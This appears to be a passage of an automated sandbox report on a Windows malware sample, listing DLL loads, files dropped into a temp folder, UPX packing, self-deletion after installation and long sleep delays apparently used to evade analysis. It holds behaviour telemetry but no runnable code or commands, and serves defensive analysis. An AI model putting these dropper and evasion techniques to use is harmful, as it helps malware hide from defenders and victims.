Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: KYagm8gq5S.exe

Static file information: File size 2666282 > 1048576

Source: KYagm8gq5S.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source:	Binary string: E:\clr\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: dotNetFx45_Full_setup.exe.0.dr
Source:	Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe.0.dr
Source:	Binary string: D:\Download\Download\obj\Release\curl.pdb source: nggwslounqxvwf.exe, 00000005.00000000.1694869957.0000000000FD2000.00000002.00000001.01000000.00000005.sdmp, nggwslounqxvwf.exe.0.dr
Source:	Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb source: BasicCalculator1.exe.0.dr
Source:	Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb Q:Q ,Q_CorExeMainmscoree.dll source: BasicCalculator1.exe.0.dr
Source:	Binary string: C:\Users\John\Documents\Visual Studio 2022\Projects\App\App\obj\Release\WebView.pdb source: WebView.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr

Source: nggwslounqxvwf.exe.0.dr

Static PE information: 0xE4F9916F [Tue Sep 25 12:15:43 2091 UTC]

Source: dotNetFx40_Full_setup.exe.0.dr	Static PE information: section name: .boxld01
Source: dotNetFx45_Full_setup.exe.0.dr	Static PE information: section name: .boxld01
Source: SetACL64.exe.0.dr	Static PE information: section name: _RDATA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	File created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\explorer.exe

File deleted: c:\users\user\desktop\kyagm8gq5s.exe

Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Memory allocated: 1830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Memory allocated: 3640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Memory allocated: 19B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Window / User API: threadDelayed 1194			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Window / User API: threadDelayed 3815			Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7476	Thread sleep count: 1194 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99591s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7504	Thread sleep count: 3815 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99473s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99349s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99232s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -99012s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98885s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7468	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7496	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe TID: 7452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C60
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,	0_2_004068B1
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99591	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99473	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99232	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 99012	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98885	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98125	Jump to behavior
